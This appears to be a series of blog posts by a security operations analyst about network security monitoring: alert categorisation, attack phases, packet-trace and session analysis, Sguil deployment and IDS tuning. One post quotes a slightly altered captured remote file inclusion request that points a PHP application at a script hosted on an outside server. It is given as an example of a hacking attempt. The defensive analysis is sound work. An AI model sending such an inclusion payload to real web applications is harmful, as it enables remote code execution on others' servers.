Ayoi’s

Sometimes my consultant will come and see me to verify events that occurred to our clients. This is due to some of the alerts or events have been categorized wrongly. It is not the SAs fault as IMHO the category listed in our system is lil bit confusing. The problem occurred when it comes to Scanning and Hacking Attempt category. So I decided to express my view in the email and of cause as I am a caring person (sharing is caring) I will post on this matter here.

1st of all regarding Scanning or vulnerability scanning. Scanning or vulnerability scanning is a process or activity of gathering information. We also can call this reconnaissance. If we remember, there are 5 stage or phases of attack which is reconnaissance, exploitation, reinforcement, consolidation and pillage. Let me list down the phases and its brief description.

1). Reconnaissance
Processes of validating connectivity, enumerating services, and checking for vulnerable applications. In other words information gathering process

2). Exploitation
Process of abusing, subverting, or breaching services on a target. Abuse of a service involves making illegitimate use of a legitimate mode of access. For example, an intruder might log in to a server over Telnet, Secure Shell, or Microsoft Terminal Services using a username and password stolen from another system. This is the process where the attacker will use his exploits tools on the vulnerability he discovered during the reconnaissance process.

3). Reinforcement.
This is the process where the intruders or attackers trying to gain the total (if not near total) control of the compromised machine. Some exploit may only give user access to the attacker. In reinforcement process attackers will try to escalate the access or privilege of his user.

4). Consolidation
This is when the attackers successfully establish communication with the compromised machines via newly created channel (usually thru backdoor etc). The favourite communication method is via IRC channel (as the attacker can hide behind anonymous or false identity)

5). Pillage
The execution of the main purpose of the compromise. DDoS is one of the favourite intention.

Again the phases mentioned above is merely just to categorize the attack phase. Some of attacks perhaps skip one or two of the phases (usually tools that has script and came from unstructured threat). For example, Nessus scanning may be categorized as scanning as it merely notify the attacker any vulnerability that may exists on the targeted machine. Attacks that generate Remote Include Path alerts are the good example of the difficulties that may exists in categorizing the events. Why? Because there are times when these alerts triggered hundred of times and the time gap between each alerts is small (in seconds). How to categorize these? For me it is simple.

Based on the payload itself. determine what is(are) the attackers doing. For these Remote Include path alerts, most of them didn’t do any reconnaissance at all which straight to the exploitation phase. I suggest it shud be categorized as Hacking attempt. Why? As shown by the sample payload below there is no attempt on identifying on the application information (most of the time the methodology is the same), and the attacker straight away instruct or attempt to instruct the application to run his exploit located on another server.

/G3T /admin.php?lnclude_p4th=http://www.reasons.org/tnrtb/wp-content/backup-b2b23/id2.txt?? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.blabla.com.my
User-Agent: libwww-perl/5.808

*I have to change few characters as the mod_security will not allow these to be published.

So I recommend that for SAs to categorize their alerts or events, identify the intention of the attackers. Thats why NSM data is important for identification process.

So what do you think?

p/s: Btw the phases and more on the NSM can be read at taosecurity.blogspot.com or buy the book: The Tao of Network Security Monitoring-Beyond Intrusion Detection by Richard Bejtlich

Anyway for anybody who feel offended by my last post here, I didn’t mention any names rite and of cause I did point out many many times during my years at The Client site on the importance of knowing, learning, acquiring the knowledge, skills of a security analyst. I do not feel myself need to apologize for the post anyway

My friend geek00l with his rawpacket team developed one good livecd for network based investigation and forensic tools. I think I will use it for inhouse training and perhaps to introduce that in the company. Why? I was informed by geek00l that the livecd was used in Mr Bejtlich and SANS forensic training. Plus as it utilize the NSM principle which can assists me on introducing NSM in our company as well.

So why not download the HEX LiveCD here and have a try. geek00l did provide guidance on using this tools at his blog

During image replication process, I had a nice conversation with our client’s Information Security Incident Response Manager. The topics? From about the incident that happened till security implementation at their place. He did mention to me that their plan to abandon their IDS and using IPS instead. He said that it seems that the IDS serve no purpose to their network security. Well that kind of statement did surprise me a bit as it comes from the person who suppose to be well versed in security. Anyway regarding this IPS and IDS thingy, I’ve encountered this kind of question or statement for quite some time.

I think this is similar with HIDS vs NIDS thingy. Security means to maintain the acceptable level of perceived risk. We shud consider the best method to protect our assets within the network. Even though the network is not connected to the internet, but do consider the threat from inside (structured or unstructured). There is no way we can be sure that our network is totally secure. It may be secure now (even that after we do security assessment to our network). But we simply not sure whether the network is secure, not even 5 minutes later. What we can do is to increase the difficulty level for any possible intruders to penetrate our network. How? By understanding that security is definitely not a product. Security is not defined as firewall, or IDS or any other tools. Security is a process which consists of the continuous assessment of the network either via scheduled passive or active network scanning, re-evaluating the security policy, understanding the new technology, the result from the assessment can be used for countermeasure and protection process which will be followed by detection for any new type of attacks on new vulnerabilities (where I believe NSM is the most good practice) and trust me that the network will be penetrated eventually. After responding to incident, assessment will be done again to ensure that the network will not be penetrated by that new method and the new vulnerabilities patched.

Having both NIDS and HIDS for me is the best practice, same as having both IPS and IDS. I told The Information Security Response Manager that even though you have the most advanced IPS, one 0-dayz exploit basically will defeat the prevention system. Intruders are unpredictable and some of them are smarter

To answer The Information Security Incident Response Manager’s question earlier, I just answer

“The best IDS is the one that has a team of analysts who understand the detection methods, mechanism and the indicators produced by it. IDS only will give indicators on any suspicious or anomalies on the traffic, while analyst will give context to that indicators. Human judgement, intuation and knowledge can never be replaced”

Ok now let’s examine the trace file for communications between 192.168.2.11 and 192.168.2.102 thru port 31300. (It happens that we have Security Centre by tenable installed in here - I forgot about this - and based on the diagram it’s the port used for communication between thunder-client and Log Correlation Engine (LCE) and between LCE and Security Centre)

Ok let assume that 192.168.2.11 is one of the clients installed with the thunder-client and 192.168.2.102 is the LCE.

For first 3 lines it shows that the handshake completed. (I use the -S option for printing the absolute numbers)

17:43:32.682438 IP 192.168.2.11.3452 > 192.168.2.102.31300: S 2402359895:2402359895(0) win 16384 <mss 1460,nop,nop,sackOK>

17:43:32.682566 IP 192.168.2.102.31300 > 192.168.2.11.3452: S 3239928346:3239928346(0) ack 2402359896 win 5840 <mss 1460,nop,nop,sackOK>

17:43:32.685488 IP 192.168.2.11.3452 > 192.168.2.102.31300: . ack 3239928347 win 17520

192.168.2.11 is allowed to establish connection with the LCE at port 31300 where both of the party agreeing in using Selective Acknowledgement with maximum segment size is 1460 bytes. So there’s no problem with that. Now let see the next 3 lines

17:43:32.685618 IP 192.168.2.102.31300 > 192.168.2.11.3452: F 3239928347:3239928347(0) ack 2402359896 win 5840

17:43:32.685691 IP 192.168.2.11.3452 > 192.168.2.102.31300: P 2402359896:2402359908(12) ack 3239928347 win 17520

17:43:32.685810 IP 192.168.2.102.31300 > 192.168.2.11.3452: R 3239928347:3239928347(0) win 0

After completing the handshake, it seems that the LCE is sending a FIN flagged packet meaning finishing sending data and also going into FINWAIT_1 state which LCE expected to received acknowledgement from 192.168.2.11. But instead of acknowledging the FIN request, 192.168.2.11 send 12 bytes worth of data to LCE. And of cause the LCE will respond this activity by sending a RST flagged packet informing 192.168.2.11 that the connection is reset and notice that LCE didn’t acknowledge the data (12 bytes) sent by 192.168.2.11

17:43:32.687122 IP 192.168.2.11.3452 > 192.168.2.102.31300: . ack 3239928348 win 17520

17:43:32.687239 IP 192.168.2.102.31300 > 192.168.2.11.3452: R 3239928348:3239928348(0) win 0

17:43:32.687308 IP 192.168.2.11.3452 > 192.168.2.102.31300: F 2402359908:2402359908(0) ack 3239928348 win 17520

17:43:32.687425 IP 192.168.2.102.31300 > 192.168.2.11.3452: R 3239928348:3239928348(0) win 0

After receiving RST flagged packet from the LCE then 192.168.2.11 acknowledge the F flagged packet sent before by the LCE. And instead of sending any acknowledgement on FIN flagged packet sent by 192.168.2.11, the LCE send RST.

I dun think this behaviour has any relation with half close or half open TCP.

I dun think the LCE is receiving any data from .11 even tho in the trace above .11 did PUSH 12 bytes worth of data.

Why LCE is sending F flagged packet after establishing connection with .11 before that fella even send any data.

Compared to this :

16:12:14.521462 IP 192.168.8.130.80 > 192.168.8.1.2265: P 3687267773:3687268152(379) ack 3484844050 win 65535

16:12:14.521486 IP 192.168.8.1.2265 > 192.168.8.130.80: . ack 3687268152 win 65535

16:12:14.522618 IP 192.168.8.1.2265 > 192.168.8.130.80: F 3484844050:3484844050(0) ack 3687268152 win 65535

16:12:14.522618 IP 192.168.8.130.80 > 192.168.8.1.2265: . ack 3484844051 win 65535

16:12:14.522618 IP 192.168.8.130.80 > 192.168.8.1.2265: F 3687268152:3687268152(0) ack 3484844051 win 65535

16:12:14.522618 IP 192.168.8.1.2265 > 192.168.8.130.80: . ack 3687268153 win 65535

That’s what I called gracefull ending of conversation

Any other ideas?

Managed to look some trace files gathered by log_packet.sh. I tried to apply structured traffic analysis methodology on those trace files as my technical write-up will be based on it. I think STA enable us to examine/data mining from the trace files where basically we can extract/construct/gather information thru statistical, session, alerts and full content data. Easier to identify normal, suspicious and malicious traffics

Anyway, from one of the trace file there’re 4 session record (top 4) which I think need a lil bit check up.

records SrcAddr DstAddr Dport Type

=================================

25 192.168.2.5 192.168.2.41.1962 tcp

25 192.168.2.11 192.168.2.102.31300 tcp

25 192.168.2.41 192.168.2.5.902 tcp

23 192.168.2.5 192.168.2.41.1971 tcp

It seems that 192.168.2.41 is lil bit chatty especially towards 192.168.2.5 at port 902.

There are 76 records (TCP) for conversation between 192.168.2.41 and 192.168.2.5

[ayoi@sguil trace-04-05-07]# racount -ar honeypot_trace.argus - host 192.168.2.41 and 192.168.2.5
racount records total_pkts src_pkts dst_pkts total_bytes

tcp 76 187448 116183 71265 173692298

arp 3 9 3 6 540

sum 79 187457 116186 71271 173692838

From full content data, I can’s see a thing and I suspect this communications were conducted in secured way or encrypted.

192.168.002.041.01971-192.168.002.005.00902: …. .w;s…|P.>..d…………”XxT1….. …….zfl.4q…..a…….z..I..

192.168.002.005.00902-192.168.002.041.01962: .r{rr..?…5;….E…@…C…..P.8){n.<YG..>m.L=7).m..u`.1 …..V.)w… ..J’\)….a.~..k……x.%…f..e…f..t.
. …}.+4.f…..fs…$=…5.s….a…..N.U.q….’..:c…………Ql……”……).-..~…/1.5\N….<..B..Xd..C.
…..a..c’…xH1..n’…n……
\`H3.^;/..3h.ym.om[..-.......56%..........1......Q... .-.P...3.FE....!-..m.....<.N.....Q%.1.K.'....oa#.=^....e:.|Y)a....h..N: {%.........I/.GH...c.4_.C.....W
........f...........^...V.....d...._.]..W…”…’&.N….!…L…p..r…k.1r..A.:….L$_…@.6…w……..U…{!..HE.S?….c)..(…..”…T……….Z>c.a..B..
….,S……E..u.&…d..k…..(……..V.#………I…e….W..H..(L.E…v?…..&o.W…..a.jX..q….(2:…..>u.u….,.7a*.AS6.L6L2L.R.1.v..48[:...lH&s.,.....
........N}.:D.#...3.u.E......Uh .7.,.O..*.....r.#,.G..i...}...F.4..Z.2.........{....?..^M..]….n…!.`.r’:..[r.&.}..Y.....3....K.....t..........H.n...o..E&_
...Ad
.W..<.E..|...wV.....%...Hy.'..!.%$..l.....iW1....[..nAkn.a.1$.f?..D...u9.).....$`K...K...W..~......4L.px..t..^M@-f..C,(...........qN....)."tu.P.....O?.3.>...
"...D...<.4M_.H.?.Xu..........

Bahh... Well let see what is actually running on port 902?

Old ways;

[ayoi@sguil trace-04-05-07]# nc -vv 192.168.2.5 902
Connection to 192.168.2.5 902 port [tcp/*] succeeded!
220 VMware Authentication Daemon Version 1.10: SSL Required, MKSDisplayProtocol:VNC

Ohh okay. Now I know.

Anyway for another session

25 192.168.2.11 192.168.2.102.31300 tcp

Well I do wonder what is port 31300 meant for?

racount   records   total_pkts   src_pkts  dst_pkts  total_bytes

tcp           25            250                125         125             14200

That’s the total session records for communication between 192.168.2.11 and 192.168.2.102 where the destination port is 31300.

StartTime Type SrcAddr Sport Dir DstAddr Dport SrcPkt DstPkt SrcBytes DstBytes State
04 May 07 17:43:32 tcp 192.168.2.11.3452 -> 192.168.2.102.31300 5 5 290 278 RST
04 May 07 17:44:31 tcp 192.168.2.11.3453 -> 192.168.2.102.31300 5 5 290 278 RST
04 May 07 17:45:30 tcp 192.168.2.11.3454 -> 192.168.2.102.31300 5 5 290 278 RST
04 May 07 17:46:29 tcp 192.168.2.11.3455 -> 192.168.2.102.31300 5 5 290 278 RST
04 May 07 17:47:28 tcp 192.168.2.11.3456 -> 192.168.2.102.31300 5 5 290 278 RST
04 May 07 17:48:27 tcp 192.168.2.11.3458 -> 192.168.2.102.31300 5 5 290 278 RST
04 May 07 17:49:26 tcp 192.168.2.11.3459 -> 192.168.2.102.31300 5 5 290 278 RST
04 May 07 17:50:25 tcp 192.168.2.11.3460 -> 192.168.2.102.31300 5 5 290 278 RST

———————————————Edited—————————————————————-

Interesting? Well the source port is increasing by 1, where the src and dst packet are 5 with 290 and 278 bytes respectively. Also the connection state is RESET. Scanning?

192.168.002.011.03452-192.168.002.102.31300: …………
192.168.002.011.03453-192.168.002.102.31300: …………
192.168.002.011.03454-192.168.002.102.31300: …………
192.168.002.011.03455-192.168.002.102.31300: …………
192.168.002.011.03456-192.168.002.102.31300: …………
192.168.002.011.03458-192.168.002.102.31300: …………

Nothing much can be seen here. And no alerts also generated when snort were asked to trigger any alerts from reading the trace file (The ones that has been defined only between 192.168.2.11 and 192.168.2.102)

So let see the trace file itself

17:43:32.682438 IP 192.168.2.11.3452 > 192.168.2.102.31300: S 2402359895:2402359895(0) win 16384 <mss 1460,nop,nop,sackOK>
17:43:32.682566 IP 192.168.2.102.31300 > 192.168.2.11.3452: S 3239928346:3239928346(0) ack 2402359896 win 5840 <mss 1460,nop,nop,sackOK>
17:43:32.685488 IP 192.168.2.11.3452 > 192.168.2.102.31300: . ack 1 win 17520
17:43:32.685618 IP 192.168.2.102.31300 > 192.168.2.11.3452: F 1:1(0) ack 1 win 5840
17:43:32.685691 IP 192.168.2.11.3452 > 192.168.2.102.31300: P 1:13(12) ack 1 win 17520
17:43:32.685810 IP 192.168.2.102.31300 > 192.168.2.11.3452: R 3239928347:3239928347(0) win 0
17:43:32.687122 IP 192.168.2.11.3452 > 192.168.2.102.31300: . ack 2 win 17520
17:43:32.687239 IP 192.168.2.102.31300 > 192.168.2.11.3452: R 3239928348:3239928348(0) win 0
17:43:32.687308 IP 192.168.2.11.3452 > 192.168.2.102.31300: F 13:13(0) ack 2 win 17520
17:43:32.687425 IP 192.168.2.102.31300 > 192.168.2.11.3452: R 3239928348:3239928348(0) win 0
17:44:31.667868 IP 192.168.2.11.3453 > 192.168.2.102.31300: S 641441975:641441975(0) win 16384 <mss 1460,nop,nop,sackOK>
17:44:31.667997 IP 192.168.2.102.31300 > 192.168.2.11.3453: S 3307726379:3307726379(0) ack 641441976 win 5840 <mss 1460,nop,nop,sackOK>
17:44:31.670103 IP 192.168.2.11.3453 > 192.168.2.102.31300: . ack 1 win 17520
17:44:31.670218 IP 192.168.2.11.3453 > 192.168.2.102.31300: P 1:13(12) ack 1 win 17520
17:44:31.670288 IP 192.168.2.102.31300 > 192.168.2.11.3453: F 1:1(0) ack 1 win 5840
17:44:31.670355 IP 192.168.2.102.31300 > 192.168.2.11.3453: R 3307726380:3307726380(0) win 0
17:44:31.673007 IP 192.168.2.11.3453 > 192.168.2.102.31300: . ack 2 win 17520
17:44:31.673133 IP 192.168.2.102.31300 > 192.168.2.11.3453: R 3307726381:3307726381(0) win 0
17:44:31.674712 IP 192.168.2.11.3453 > 192.168.2.102.31300: F 13:13(0) ack 2 win 17520
17:44:31.674827 IP 192.168.2.102.31300 > 192.168.2.11.3453: R 3307726381:3307726381(0) win 0

It seems that 102 is sending a RST flagged packet immediately after sending FIN flagged packet. It seems it doesn’t want to wait the FIN ack from .11 tho. Anyone can give a better analysis please?

p/s: I might as well ask the owner of 192.168.2.11 and 192.168.2.102 for this

Your input/view/opinion/criticism are highly appreciated. I’m still learning maa..

I can’t get anything done today. Why? Dunno. My brain seems to boycott me. (fortunately it still process the basic functions properly if not then I’ll be lying on my bed doing nothing)

Anyway I’ve came across with shirkdog post on Tuning the IDS. His posting did mention about the needs of having the right rules for the right segment monitored. What are the purpose of having IIS and windows related rules when the segment that u monitored like the DMZ dun have any windows installed on the machines? Unless there’s any case that an administrator who has IIS installed on his apache powered web servers which I highly doubt will happen.

That reminds me of the discussion that I had with my colleague on friday. Actually the argument was about the needs of full content. To be specific is access speed for analyst to access the full content data. To have full content, session, statistical and alerts data is the ideal way for monitoring purpose. But for our clients, the bandwidth and storage are the main issue. So I suggest that we shud fine tune the rules, log as many as we can for session data and trigger the full content data collection when there’re any suspicious traffics that need to be analysed. Having all the rules activated will of cause generate too many false positives alerts. For example, why do we have to waste our time analysing WEB-IIS ISAPI .idq access or WEB-IIS CodeRed v2 root.exe access alerts attempts on our freebsd with apache webservers?

You tell me.

p/s: I’m still finalising the materials for geek00l’s security analyst handbook. There are few adjustment needed as some of the information are sensitive hehehe. Perhaps I shud simulate the attack. Hmmm

Well, I did learn something yesterday and few days back. From reading Mr.Bejtlich article on insecure magazine (Issue 4, Oct 2005) and also from conversation with my friend, geek00l. From the article I learnt what to see, what to look and how to properly use the trace files that we have by using open source tools and most of them (I think all of them) available on FreeBSD and perhaps other OSes as well such as argus, tcpdstat, tcpflow (now can use radump). And from my friend geek00l, he showed how to trace passive ftp traffics (example-a good one btw) with argus (ragrep, ra, radump) and even show that detecting IPv6 passive ftp traffic is more simpler than IPv4. I told you he is good.

So perhaps next postings I can show that from this :

16:12:14.510121 IP 192.168.8.1.2265 > 192.168.8.130.http: S 3484844009:3484844009(0) win 65535 <mss 1460,nop,nop,sackOK>
16:12:14.510121 IP 192.168.8.130.http > 192.168.8.1.2265: S 3687266312:3687266312(0) ack 3484844010 win 65535 <mss 1460,sackOK,eol>
16:12:14.510121 IP 192.168.8.1.2265 > 192.168.8.130.http: . ack 1 win 65535
16:12:14.511997 IP 192.168.8.1.2265 > 192.168.8.130.http: P 1:41(40) ack 1 win 65535
16:12:14.520966 IP 192.168.8.130.http > 192.168.8.1.2265: . 1:1461(1460) ack 41 win 65535
16:12:14.521462 IP 192.168.8.130.http > 192.168.8.1.2265: P 1461:1840(379) ack 41 win 65535
16:12:14.521486 IP 192.168.8.1.2265 > 192.168.8.130.http: . ack 1840 win 65535

Getting this (statistical data):

StartTime: Tue Apr 17 16:12:14 2007
EndTime: Tue Apr 17 16:12:24 2007
TotalTime: 10.93 seconds
TotalCapSize: 0.86MB CapLen: 512 bytes
# of packets: 2694 (1.17MB)
AvgRate: 974.33Kbps stddev:1162.70K

### IP flow (unique src/dst pair) Information ###
# of flows: 2 (avg. 1347.00 pkts/flow)
Top 10 big flow size (bytes/total in %):
75.0% 25.0%

### IP address Information ###
# of IPv4 addresses: 2
Top 10 bandwidth usage (bytes/total in %):
100.0% 100.0%
### Packet Size Distribution (including MAC headers) ###
<<<<
[ 32- 63]: 720
[ 64- 127]: 28
[ 128- 255]: 7
[ 256- 511]: 833
[ 512- 1023]: 820
[ 1024- 2047]: 286 protocol packets bytes bytes/pkt
————————————————————————
[0] total 2694 (100.00%) 1230404 (100.00%) 456.72
[1] ip 2694 (100.00%) 1230404 (100.00%) 456.72
[2] tcp 2662 ( 98.81%) 1228043 ( 99.81%) 461.32
[3] http(s) 1234 ( 45.81%) 914754 ( 74.35%) 741.29
[3] http(c) 1150 ( 42.69%) 297133 ( 24.15%) 258.38
[3] squid 12 ( 0.45%) 696 ( 0.06%) 58.00
[3] other 266 ( 9.87%) 15460 ( 1.26%) 58.12
[2] udp 12 ( 0.45%) 1085 ( 0.09%) 90.42
[3] dns 3 ( 0.11%) 338 ( 0.03%) 112.67
[3] other 9 ( 0.33%) 747 ( 0.06%) 83.00
[2] icmp 20 ( 0.74%) 1276 ( 0.10%) 63.80

And from there look at the session

StartTime Flgs Type SrcAddr Sport Dir DstAddr Dport SrcPkt DstPkt SrcBytes DstBytes State

17 Apr 07 16:12:14 tcp 192.168.8.1.2265 -> 192.168.8.130.80 6 5 372 2117 FIN
17 Apr 07 16:12:14 tcp 192.168.8.1.2267 -> 192.168.8.130.80 6 5 478 2174 FIN

and see what actually happen (I’m using tcpflow instead of radump. Basically ragrep and radump are faster). Have some minor prob with argus 3 and I can hear geek00l is laughing his head off.

192.168.008.001.02320-192.168.008.130.00080: GET /iissamples/ HTTP/1.1
Connection: Keep-Alive
Host: ayoimonitoring
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

192.168.008.130.00080-192.168.008.001.02320: HTTP/1.1 404 Not Found
Date: Tue, 17 Apr 2007 08:12:20 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4 with Suhosin-Patch
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

And we might even can see whut alerts that might triggered. Or can use the alerts to investigate using session and full content as above.

[**] [1:993:11] WEB-IIS iisadmin access [**]
[Classification: Web Application Attack] [Priority: 1]
04/17-16:12:20.595945 192.168.8.1:2320 -> 192.168.8.130:80
TCP TTL:128 TOS:0×0 ID:12258 IpLen:20 DgmLen:329 DF
***AP*** Seq: 0×6E6D2495 Ack: 0xC519A20F Win: 0xFDE9 TcpLen: 20

[**] [1:1402:7] WEB-IIS iissamples access [**]
[Classification: Web Application Attack] [Priority: 1]
04/17-16:12:20.598448 192.168.8.1:2320 -> 192.168.8.130:80
TCP TTL:128 TOS:0×0 ID:12259 IpLen:20 DgmLen:331 DF
***AP*** Seq: 0×6E6D25B6 Ack: 0xC519A427 Win: 0xFBD1 TcpLen: 20

Security is relatively new in Malaysia (Based on my observation anyway) as the awareness level is errrr.. I can put it mediocre. Okay, ppl know about firewalls and IDS (IPS nowadays) but the proper understanding is not there. (snort itself only is not the IDS. It is only one of the IDS tools or to be exact the detection engine). What are the purpose of having the detection engine if there’s no one or nobody to interprate the output generated by it? What are the purpose of having personnel to monitor all the alerts triggered if they don’t have (or refuse to equip themselves)adequate knowledge in analysing intrusion or extrusion incidents?

NSM or Network Security Monitoring is new to me. I believe there’re people in Malaysia who working hard in introducing and increasing the awareness level of proper network security monitoring in Malaysia. People like geek00l, mel and others even provides few trainings on this matter as well. Me? To be honest, I only took this analysis field seriously since 2004. Yeah, still a new person in this field(proper). I tried to catch up by reading, asking, hands-on training and practice to equip myself with the proper knowledge.

Why NSM? I embracing this principle because of the problems that I’ve encountered during my service years at The Client site. The main problem is alerts validation. I discovered that it is damned difficult to give an absolute answer on alerts just based on its payloads and other related alerts triggered. Most of the time, my analysis will not be conclusive, lack of other resources to make my analysis really firm and absolute. That’s why I said on my previous posts, it was  more like a guessing game.

If you are an analyst, detecting intrusion or extrusion incidents is your job scope, trust me, you can’t help but to admit that so far the nsm principles is the best practice.

I’ve been asked about nsm and sguil for few times. Well most of the time I will either refer them to Richard’s blog or ask them to read his book (The Tao of Network Security Monitoring-Beyond Intrusion Detection).

I am using sguil because for time being it is the only application that really embrace the nsm concept. The user can make use all the data collected by its sensor in order to identify and validating any intrusions or extrusion incidents. IMHO, while performing my daily tasks the main concern or problem that I’ve encountered so many times is validating intrusion/extrusion. Once we received alerts or warning on suspicious activities, the main questions need to be answered.

“Are these warnings or alerts valid or only false alarm? Why?”
Believe me, based on my experience, having only snort alerts will make this question too difficult to answer properly. Why? Most of the time after looking at the alerts, there is nothing we else can do. You can guess whether the activities that trigger the alerts have any damaging impact on the victim by trying to simulate the attack based on the payload. And these only effective for most of the web attack. Other than that? “Notify the Network Administrator or The Client authorized personnel on the activities detected and ask them to check their server.”

NSM is about collection, analysis, and escalation of indications and warnings to detect and respond to intrusions or extrusions. Product or tools will do the data collection and HUMAN intervention is needed in order to provide context or analyze the data collected. Full content, session, statistical and alert data are necessary resources needed by analysts in doing their analysis. Having all those 4 data is an ideal setup but we might have to settle for an optimal setup to accomodate our network structure and design (allocating a huge storage for full content might not be possible in one network but not to other network. Still instead of having a month worth of full content data, might as well just store a day or a week data and more session data).

NSM is not a SEM, forensic tools, and intrusion prevention tools. It is a concept. Sguil is an application that embraces this concept. If u are using other application, collecting necessary data, designing defensible network, realized that prevention eventually fails, you are practising NSM. NSM is not Sguil and Sguil is not NSM. 2 different thing ok?

Finally I have one machine (old one but I think can do the job btw) to run sguil. Because I dun have the luxury of having many machines (it will take quite a loooooooooooooooooooooooong time to get one btw) so I have the sguil server and sensor installed in that *cough testing *cough machine. Managed to savaged the RAM from other unwanted machines (pc133 RAM is lil bit difficult to find here).

lil bit info of the machine:

FreeBSD sguil.mss 6.2-RELEASE-p2 FreeBSD 6.2-RELEASE-p2 #0: Tue Feb 27 22:41:06 UTC 2007

Intel(R) Pentium(R) 4 CPU 1.50GHz (1523.56-MHz 686-class CPU)
real memory  = 805306368 (768 MB)
avail memory = 778682368 (742 MB)

Filesystem        Size          Used   Avail       Capacity    Mounted on
/dev/ad0s1a    496M     36M    420M          8%                /
devfs                 1.0K         1.0K      0B            100%           /dev
/dev/ad3s1d     36G       16K     33G             0%               /nsm
/dev/ad0s1e     33G       1.2G    30G             4%              /usr
/dev/ad0s1d    1.7G       39M    1.5G             2%             /var
For time being, I only plan to deploy this machine to monitor our SOC network only. Hmm I do need another machine to be placed in front of our firewall as well. Initially I plan just to use the data gathered by our internal and external sensor but after second, third and fourth thought I think better for me to request one manageable switch to mirror all the traffic to the sguil. I just don’t want to answer many queries later.

The purpose of this machine :

1). Actually to see the size required to store full content data, at least one day’s worth.

2). The data collected will be used in my training that I have to conduct later.

3). To introduce the usage of all the data collected by sguil in validating/investigating incidents or suspicious traffic to the analyst at the SOC. I might call it NSM awareness.

4).  Perhaps we can do some data mining and traffic threat analysis

5). For Attack and Defense project. Our pen tester will run/scan/brute force any exploits or 0-dayz exploit developed by our TSS team on a machine or machines placed in the SOC. We will try to detect this activities (some of it will not be triggered by IDS, so the ability and knowledge to do traffic analysis will be beneficial).

6). To compare the detection / data collection mechanism with our current SIEM. Perhaps in the future we can integrate the session and full content data collection besides only alerts and devices logs.

7). Needed for my so called white paper.

Actually there’re thousands reasons why I want my sguil deployed. But those above are the main factors. Maybe sguil will be used in the SOC later or maybe not or maybe we finally realized that those data are important.

p/s: I just realized that the time stamp on my sguil-client is not correct. While the clock on my windows  taskbar shows 10:39 AM, the time shown at the Sguil-client is 01:29. But after doing some minor adjustment to the SguilUtil.tcl, everything solved and the time is shown correctly.

This is what I do :

C:\sguil-client-0.6.1\sguil-0.6.1\client\lib\SguilUtil.tcl (I just edit the file using wordpad)

Just change from true to false (-gmt true –> -gmt false)

# GetCurrentTimeStamp: Returns date/time in YYYYY-MM-DD HH:MM:SS.
#
proc GetCurrentTimeStamp { {clockOption {today} } } {
set timestamp [clock format [clock scan "$clockOption"] -gmt true -f “%Y-%m-%d %T”]
return $timestamp
}
proc GetCurrentTimeStamp { {clockOption {today} } } {
set timestamp [clock format [clock scan "$clockOption"] -gmt false -f “%Y-%m-%d %T”]
return $timestamp
}

p/ss: I still believe a knowledgeable analyst still needed in detecting incidents. Nothing can beat human intuition, instinct and judgement. I wish we do have the fully automated super SIEM/SEM but I dun think it will happen. Human intervention will always be needed.